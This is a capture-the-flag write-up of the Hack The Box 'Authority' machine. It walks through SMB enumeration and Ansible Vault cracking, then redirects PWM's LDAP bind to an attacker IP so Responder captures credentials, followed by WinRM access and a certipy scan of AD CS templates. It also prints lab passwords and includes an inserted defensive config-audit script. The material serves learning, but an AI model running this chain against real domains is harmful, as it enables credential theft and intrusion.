[HTB] Authority


zelda8

Preface

I haven't done many Windows boxes, so this one was a long slog.

Information gathering

nmap

$ sudo nmap -p- --min-rate=10000 10.10.11.222
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-25 02:49 EDT
Warning: 10.10.11.222 giving up on port because retransmission cap hit (10).
Nmap scan report for authority.htb (10.10.11.222)
Host is up (0.078s latency).
Not shown: 65472 closed tcp ports (reset), 34 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
8443/tcp open https-alt
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49672/tcp open unknown
49685/tcp open unknown
49686/tcp open unknown
49689/tcp open unknown
49690/tcp open unknown
49694/tcp open unknown
49702/tcp open unknown
49711/tcp open unknown
57114/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 14.38 seconds

$ sudo nmap -sT -sV -sC -O -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,8443,9389,47001,49664,49665,49666,49667,49672,49685,49686,49689,49690,49694,49702,49711,57114 10.10.11.222
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-25 03:02 EDT
Nmap scan report for authority.htb (10.10.11.222)
Host is up (0.076s latency).

PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-07-25 11:03:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
|_ssl-date: 2023-07-25T11:04:17+00:00; +4h00m02s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2023-07-25T11:04:17+00:00; +4h00m02s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
|_ssl-date: 2023-07-25T11:04:17+00:00; +4h00m02s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2023-07-25T11:04:16+00:00; +4h00m01s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8443/tcp open ssl/https-alt
| fingerprint-strings:
| FourOhFourRequest, GetRequest:
| HTTP/1.1 200
| Content-Type: text/html;charset=ISO-8859-1
| Content-Length: 82
| Date: Tue, 25 Jul 2023 11:03:07 GMT
| Connection: close
| <html><head><meta http-equiv="refresh" content="0;URL='/pwm'"/></head></html>
| HTTPOptions:
| HTTP/1.1 200
| Allow: GET, HEAD, POST, OPTIONS
| Content-Length: 0
| Date: Tue, 25 Jul 2023 11:03:07 GMT
| Connection: close
| RTSPRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 1936
| Date: Tue, 25 Jul 2023 11:03:13 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
| Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_ Request</h1><hr class="line" /><p><b>Type</b> Exception Report</p><p><b>Message</b> Invalid character found in the HTTP protocol [RTSP&#47;1.00x0d0x0a0x0d0x0a...]</p><p><b>Description</b> The server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid
| ssl-cert: Subject: commonName=172.16.2.118
| Not valid before: 2023-07-23T09:37:08
|_Not valid after: 2025-07-24T21:15:32
|_ssl-date: TLS randomness does not represent time
|_http-title: Site doesn't have a title (text/plain;charset=UTF-8).
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49685/tcp open msrpc Microsoft Windows RPC
49686/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49689/tcp open msrpc Microsoft Windows RPC
49690/tcp open msrpc Microsoft Windows RPC
49694/tcp open msrpc Microsoft Windows RPC
49702/tcp open msrpc Microsoft Windows RPC
49711/tcp open msrpc Microsoft Windows RPC
57114/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8443-TCP:V=7.94%T=SSL%I=7%D=7/25%Time=64BF73A9%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,DB,"HTTP/1\.1\x20200\x20\r\nContent-Type:\x20text/html;c
SF:harset=ISO-8859-1\r\nContent-Length:\x2082\r\nDate:\x20Tue,\x2025\x20Ju
SF:l\x202023\x2011:03:07\x20GMT\r\nConnection:\x20close\r\n\r\n\n\n\n\n\n<
SF:html><head><meta\x20http-equiv=\"refresh\"\x20content=\"0;URL='/pwm'\"/
SF:></head></html>")%r(HTTPOptions,7D,"HTTP/1\.1\x20200\x20\r\nAllow:\x20G
SF:ET,\x20HEAD,\x20POST,\x20OPTIONS\r\nContent-Length:\x200\r\nDate:\x20Tu
SF:e,\x2025\x20Jul\x202023\x2011:03:07\x20GMT\r\nConnection:\x20close\r\n\
SF:r\n")%r(FourOhFourRequest,DB,"HTTP/1\.1\x20200\x20\r\nContent-Type:\x20
SF:text/html;charset=ISO-8859-1\r\nContent-Length:\x2082\r\nDate:\x20Tue,\
SF:x2025\x20Jul\x202023\x2011:03:07\x20GMT\r\nConnection:\x20close\r\n\r\n
SF:\n\n\n\n\n<html><head><meta\x20http-equiv=\"refresh\"\x20content=\"0;UR
SF:L='/pwm'\"/></head></html>")%r(RTSPRequest,82C,"HTTP/1\.1\x20400\x20\r\
SF:nContent-Type:\x20text/html;charset=utf-8\r\nContent-Language:\x20en\r\
SF:nContent-Length:\x201936\r\nDate:\x20Tue,\x2025\x20Jul\x202023\x2011:03
SF::13\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20html><html\x20la
SF:ng=\"en\"><head><title>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20
SF:Request</title><style\x20type=\"text/css\">body\x20{font-family:Tahoma,
SF:Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;background
SF:-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-size:16px;}\
SF:x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\x20{color:bla
SF:ck;}\x20\.line\x20{height:1px;background-color:#525D76;border:none;}</s
SF:tyle></head><body><h1>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20R
SF:equest</h1><hr\x20class=\"line\"\x20/><p><b>Type</b>\x20Exception\x20Re
SF:port</p><p><b>Message</b>\x20Invalid\x20character\x20found\x20in\x20the
SF:\x20HTTP\x20protocol\x20\[RTSP&#47;1\.00x0d0x0a0x0d0x0a\.\.\.\]</p><p><
SF:b>Description</b>\x20The\x20server\x20cannot\x20or\x20will\x20not\x20pr
SF:ocess\x20the\x20request\x20due\x20to\x20something\x20that\x20is\x20perc
SF:eived\x20to\x20be\x20a\x20client\x20error\x20\(e\.g\.,\x20malformed\x20
SF:request\x20syntax,\x20invalid\x20");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2019 (96%), Microsoft Windows 10 1709 - 1909 (93%), Microsoft Windows Server 2012 (92%), Microsoft Windows Vista SP1 (92%), Microsoft Windows Longhorn (92%), Microsoft Windows 10 1709 - 1803 (91%), Microsoft Windows 10 1809 - 2004 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 Update 1 (91%), Microsoft Windows Server 2016 build 10586 - 14393 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: AUTHORITY; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 4h00m01s, deviation: 0s, median: 4h00m01s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-07-25T11:04:06
|_ start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 83.37 seconds

$ sudo nmap --script=vuln 10.10.11.222
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-25 23:17 EDT
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for authority.htb (10.10.11.222)
Host is up (0.075s latency).
Not shown: 987 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
8443/tcp open https-alt
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-phpmyadmin-dir-traversal:
| VULNERABLE:
| phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
| State: UNKNOWN (unable to test)
| IDs: CVE:CVE-2005-3299
| PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.
|
| Disclosure date: 2005-10-nil
| Extra information:
| ../../../../../etc/passwd :
|
|
|
|
|
| <html><head><meta http-equiv="refresh" content="0;URL='/pwm'"/></head></html>
| References:
| http://www.exploit-db.com/exploits/1244/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
| Modulus Type: Safe prime
| Modulus Source: RFC2409/Oakley Group 2
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
|_http-majordomo2-dir-traversal: ERROR: Script execution failed (use -d to debug)

Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false

Nmap done: 1 IP address (1 host up) scanned in 314.65 seconds

Great, so that's how it's going to be: 29 open ports. Why not 290?

That said, the high-numbered RPC ports at the end can all be ignored. Going through the rest: from experience, port 80 always deserves a look, so do the SMB services on 139 and 445, and there is an unidentified HTTPS service on 8443 (https-alt) that needs checking too. I don't know yet whether the others matter; we'll work through the familiar services one by one first and come back to the rest if that doesn't pan out.

Other scans

Why no nikto this time, and no directory brute-force? Because while nmap was running I took a quick look at port 80 and found the default IIS page, so there was nothing worth scanning.

Service exploitation

smb

Since port 80 is a dead end, it's 445's turn. First let's check whether any SMB shares can be accessed without a password.

$ smbclient -L 10.10.11.222
Password for [WORKGROUP\me]:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Department Shares Disk
Development Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.222 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

smbclient -L lists the shares directly, but it says nothing about access permissions, so we still need to run smbmap.

$ smbmap -H 10.10.11.222
[+] IP: 10.10.11.222:445 Name: authority.htb

Why no results? smbclient could list them just fine. Looking at the output above, I guessed it probably needs a username.

$ smbmap -H 10.10.11.222 -u "test"
[+] Guest session IP: 10.10.11.222:445 Name: authority.htb
Disk Permissions Comment
--------------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
Department Shares NO ACCESS
Development READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share

Sure enough. We can see that both Development and IPC$ are readable, so let's look at Development, since IPC$ usually contains nothing of interest. We log in directly without a password.

$ smbclient //10.10.11.222/Development
Password for [WORKGROUP\me]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Mar 17 09:20:38 2023
.. D 0 Fri Mar 17 09:20:38 2023
Automation D 0 Fri Mar 17 09:20:40 2023

5888511 blocks of size 4096. 1215595 blocks available
smb: \> cd Automation\
smb: \Automation\> ls
. D 0 Fri Mar 17 09:20:40 2023
.. D 0 Fri Mar 17 09:20:40 2023
Ansible D 0 Fri Mar 17 09:20:50 2023

5888511 blocks of size 4096. 1215595 blocks available
smb: \Automation\> cd Ansible\
smb: \Automation\Ansible\> ls
. D 0 Fri Mar 17 09:20:50 2023
.. D 0 Fri Mar 17 09:20:50 2023
ADCS D 0 Fri Mar 17 09:20:48 2023
LDAP D 0 Fri Mar 17 09:20:48 2023
PWM D 0 Fri Mar 17 09:20:48 2023
SHARE D 0 Fri Mar 17 09:20:48 2023

5888511 blocks of size 4096. 1215595 blocks available

Since I'm not very familiar with any of this, I spent a long time looking at each directory. Dizzying.

PWM

I didn't know what any of these were for. Let's set them aside for now and see what the HTTPS site on 8443 is.


Right away it shows a notice saying that PWM is currently in configuration mode and that the configuration can be updated without LDAP authentication, followed by a login form.

Inspiration struck: we saw a PWM directory in the SMB share earlier. Could it contain login credentials? Let's go back and dig through it.

Cracking the Ansible Vault ciphertext

smb: \Automation\Ansible\PWM\defaults\> ls
. D 0 Fri Mar 17 09:20:48 2023
.. D 0 Fri Mar 17 09:20:48 2023
main.yml A 1591 Sun Apr 23 18:51:38 2023

5888511 blocks of size 4096. 1215531 blocks available
smb: \Automation\Ansible\PWM\defaults\> get main.yml
getting file \Automation\Ansible\PWM\defaults\main.yml of size 1591 as main.yml (5.0 KiloBytes/sec) (average 3.8 KiloBytes/sec)

Under \Automation\Ansible\PWM\defaults\ we find a main.yml file. Let's look at its contents.

---
pwm_run_dir: "{{ lookup('env', 'PWD') }}"

pwm_hostname: authority.htb.corp
pwm_http_port: "{{ http_port }}"
pwm_https_port: "{{ https_port }}"
pwm_https_enable: true

pwm_require_ssl: false

pwm_admin_login: !vault |
          $ANSIBLE_VAULT;1.1;AES256
          32666534386435366537653136663731633138616264323230383566333966346662313161326239
          6134353663663462373265633832356663356239383039640a346431373431666433343434366139
          35653634376333666234613466396534343030656165396464323564373334616262613439343033
          6334326263326364380a653034313733326639323433626130343834663538326439636232306531
          3438

pwm_admin_password: !vault |
          $ANSIBLE_VAULT;1.1;AES256
          31356338343963323063373435363261323563393235633365356134616261666433393263373736
          3335616263326464633832376261306131303337653964350a363663623132353136346631396662
          38656432323830393339336231373637303535613636646561653637386634613862316638353530
          3930356637306461350a316466663037303037653761323565343338653934646533663365363035
          6531

ldap_uri: ldap://127.0.0.1/
ldap_base_dn: "DC=authority,DC=htb"
ldap_admin_password: !vault |
          $ANSIBLE_VAULT;1.1;AES256
          63303831303534303266356462373731393561313363313038376166336536666232626461653630
          3437333035366235613437373733316635313530326639330a643034623530623439616136363563
          34646237336164356438383034623462323531316333623135383134656263663266653938333334
          3238343230333633350a646664396565633037333431626163306531336336326665316430613566
          3764

pwm_admin_login, pwm_admin_password and ldap_admin_password: these are login credentials. But they are clearly stored in an encrypted form, so we need to decrypt them first. Let's look up what kind of encryption $ANSIBLE_VAULT denotes and how to handle it.

A Google search turns up a write-up on Pentester's Promiscuous Notebook describing how to handle Ansible vaults.

We follow along.

$ cat ldap.yml
$ANSIBLE_VAULT;1.1;AES256
633038313035343032663564623737313935613133633130383761663365366662326264616536303437333035366235613437373733316635313530326639330a64303462353062343961613636356334646237336164356438383034623462323531316333623135383134656263663266653938333334323834323033363335 0a646664396565633037333431626163306531336336326665316430613566 3764

$ ansible2john ldap.yml
ldap.yml:$ansible$0*0*c08105402f5db77195a13c1087af3e6fb2bdae60473056b5a477731f51502f93*dfd9eec07341bac0e13c62fe1d0a5f7d*d04b50b49aa665c4db73ad5d8804b4b2511c3b15814ebcf2fe98334284203635

$ ansible2john ldap.yml > ldap.hash

$ john ldap.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (ansible, Ansible Vault [PBKDF2-SHA256 HMAC-256 128/128 AVX 4x])
Cost 1 (iteration count) is 10000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
******** (ldap.yml)
1g 0:00:00:49 DONE (2023-07-25 03:21) 0.02030g/s 807.7p/s 807.7c/s 807.7C/s 001983..woodson
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

After all that, the vault password is cracked, so next we decrypt all three ciphertexts we obtained.

$ cat ldap.yml | ansible-vault decrypt
Vault password:
Decryption successful
DevT3st@123

$ cat username.yml | ansible-vault decrypt
Vault password:
Decryption successful
s******m

$ ansible-vault decrypt ldap.yml
Vault password:
Decryption successful
p**********3

Exploiting the PWM configuration file

With credentials in hand, let's try logging in at the PWM login page.

That login fails, so let's log in to the Configuration Manager instead.

Combined with the notice shown when we first opened the page, this means we can modify the configuration file without LDAP authentication. First download the configuration file; it turns out to be huge, so where do we start? Looking more closely at the page, the Health section shows a big WARN for LDAP:

Unable to connect to LDAP server default, error: error connecting to ldap directory (default), error: unable to create connection: unable to connect to any configured ldap url, last error: unable to bind to ldaps://authority.authority.htb:636 as CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb reason: CommunicationException (authority.authority.htb:636; PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target)

This means PWM cannot connect to the host's LDAP server, and it even reveals the bind username: CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb. So if we change the LDAP server address in the configuration file to our own, we can capture the account name and password it sends to the LDAP server when it binds.

Search the configuration file for ldaps://authority.authority.htb:636 and replace it with our own:

<setting key="ldap.serverUrls" modifyTime="2022-08-11T01:46:23Z" profile="default" syntax="STRING_ARRAY" syntaxVersion="0">
<label>LDAP ⇨ LDAP Directories ⇨ default ⇨ Connection ⇨ LDAP URLs</label>
<value>ldap://10.10.14.96:389</value>

We point it at plain LDAP on port 389 rather than LDAPS on 636 because LDAP is a cleartext protocol, which makes it easier to capture the user's credentials in the clear. After editing, we import the configuration.
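A defender-side check for exactly the edit just described, added here as an example (my code, not PWM's or the write-up's): it parses a PwmConfiguration-style document built in the same <setting> shape as the snippet above and flags every LDAP URL that is not ldaps:// or that points at a host outside an assumed allowlist, so a tampered configuration is caught before it is imported. The allowlist and the surrounding XML skeleton are assumptions.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Assumption: the only directory server PWM is supposed to bind to.
EXPECTED_LDAP_HOSTS = {"authority.authority.htb"}


def pwm_config(urls):
    """Build a constructed PwmConfiguration-style document around one
    ldap.serverUrls setting, using the element shape shown in the write-up."""
    values = "".join("      <value>%s</value>\n" % u for u in urls)
    return (
        '<PwmConfiguration>\n'
        '  <settings>\n'
        '    <setting key="ldap.serverUrls" modifyTime="2022-08-11T01:46:23Z" '
        'profile="default" syntax="STRING_ARRAY" syntaxVersion="0">\n'
        '      <label>LDAP - LDAP Directories - default - Connection - LDAP URLs</label>\n'
        + values +
        '    </setting>\n'
        '  </settings>\n'
        '</PwmConfiguration>\n'
    )


# Constructed samples: the original setting and the tampered one from the write-up.
ORIGINAL_CONFIG = pwm_config(["ldaps://authority.authority.htb:636"])
TAMPERED_CONFIG = pwm_config(["ldap://10.10.14.96:389"])


def audit_ldap_urls(xml_text, expected_hosts=EXPECTED_LDAP_HOSTS):
    """Return (profile, url, reason) findings for every LDAP URL PWM would bind to."""
    root = ET.fromstring(xml_text)
    findings = []
    for setting in root.iter("setting"):
        if setting.get("key") != "ldap.serverUrls":
            continue
        profile = setting.get("profile", "default")
        for value in setting.findall("value"):
            url = (value.text or "").strip()
            parts = urlsplit(url)
            # Anything but ldaps:// sends the svc_ldap bind password in cleartext.
            if parts.scheme.lower() != "ldaps":
                findings.append((profile, url, "cleartext-scheme"))
            # A host outside the allowlist means the bind goes to someone else's listener.
            if (parts.hostname or "").lower() not in expected_hosts:
                findings.append((profile, url, "unexpected-host"))
    return findings


if __name__ == "__main__":
    for profile, url, reason in audit_ldap_urls(TAMPERED_CONFIG):
        print("[%s] %s: %s" % (profile, url, reason))
```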

LDAP listener

Then start Responder locally to listen.

$ sudo responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|

NBT-NS, LLMNR & MDNS Responder 3.1.3.0

To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder

Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C


[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]

[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]

[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]

[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]

[+] Generic Options:
Responder NIC [tun0]
Responder IP [HTB_VPN_IP]
Responder IPv6 [HTB_VPN_IPv6]
Challenge set [random]
Don't Respond To Names ['ISATAP']

[+] Current Session Variables:
Responder Machine Name [*************]
Responder Domain Name [********]
Responder DCE-RPC Port [48723]

[+] Listening for events...

[LDAP] Cleartext Client : 10.10.11.222
[LDAP] Cleartext Username : CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb
[LDAP] Cleartext Password : l*****************!
[*] Skipping previously captured cleartext password for CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb
[*] Skipping previously captured cleartext password for CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb

And with that we have the LDAP credentials in cleartext.

Privilege escalation

Since we now have the svc_ldap credentials, we can log in directly with evil-winrm; the user flag is on the Desktop.

$ evil-winrm -i 10.10.11.222 -u svc_ldap -p l**************r!

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_ldap\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> dir

Directory: C:\Users\svc_ldap\Desktop

Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 7/25/2023 8:18 AM 34 user.txt

Escalating to root

I'm not very familiar with Windows privilege escalation, so let's first use certipy to scan Active Directory Certificate Services (AD CS) for exploitable misconfigurations.

$ certipy find -vulnerable -u svc_ldap@authority.htb -p 'lDaP_1n_th3_cle4r!' -dc-ip 10.10.11.222
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 37 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Trying to get CA configuration for 'AUTHORITY-CA' via CSRA
[!] Got error while trying to get CA configuration for 'AUTHORITY-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'AUTHORITY-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'AUTHORITY-CA'
[-] Got error: module 'enum' has no attribute '_decompose'
[-] Use -debug to print a stacktrace

It errors out, saying the enum module has no attribute _decompose. A quick search suggests this was removed in Python versions after 3.11.4. I couldn't be bothered to create a conda virtual environment, so I took a shortcut: found the _decompose source code online and added it to enum.py (not recommended; at least back the file up first and restore it afterwards).

Now it works.

$ certipy find -vulnerable -u svc_ldap@authority.htb -p 'l************r!' -dc-ip 10.10.11.222
Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 37 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Trying to get CA configuration for 'AUTHORITY-CA' via CSRA
[!] Got error while trying to get CA configuration for 'AUTHORITY-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'AUTHORITY-CA' via RRP
[*] Got CA configuration for 'AUTHORITY-CA'
[*] Saved BloodHound data to '20230725042904_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20230725042904_Certipy.txt'
[*] Saved JSON output to '20230725042904_Certipy.json'

The scan results can be viewed in 20230725042904_Certipy.txt.

$ cat 20230725042904_Certipy.txt
Certificate Authorities
0
CA Name : AUTHORITY-CA
DNS Name : authority.authority.htb
Certificate Subject : CN=AUTHORITY-CA, DC=authority, DC=htb
Certificate Serial Number : 2C4E1F3CA46BBDAF42A1DDE3EC33A6B4
Certificate Validity Start : 2023-04-24 01:46:26+00:00
Certificate Validity End : 2123-04-24 01:56:25+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : AUTHORITY.HTB\Administrators
Access Rights
ManageCa : AUTHORITY.HTB\Administrators
AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
ManageCertificates : AUTHORITY.HTB\Administrators
AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
Enroll : AUTHORITY.HTB\Authenticated Users
Certificate Templates
0
Template Name : CorpVPN
Display Name : Corp VPN
Certificate Authorities : AUTHORITY-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : IncludeSymmetricAlgorithms
PublishToDs
AutoEnrollmentCheckUserDsCertificate
Private Key Flag : ExportableKey
Extended Key Usage : Encrypting File System
Secure Email
Client Authentication
Document Signing
IP security IKE intermediate
IP security use
KDC Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 20 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : AUTHORITY.HTB\Domain Computers
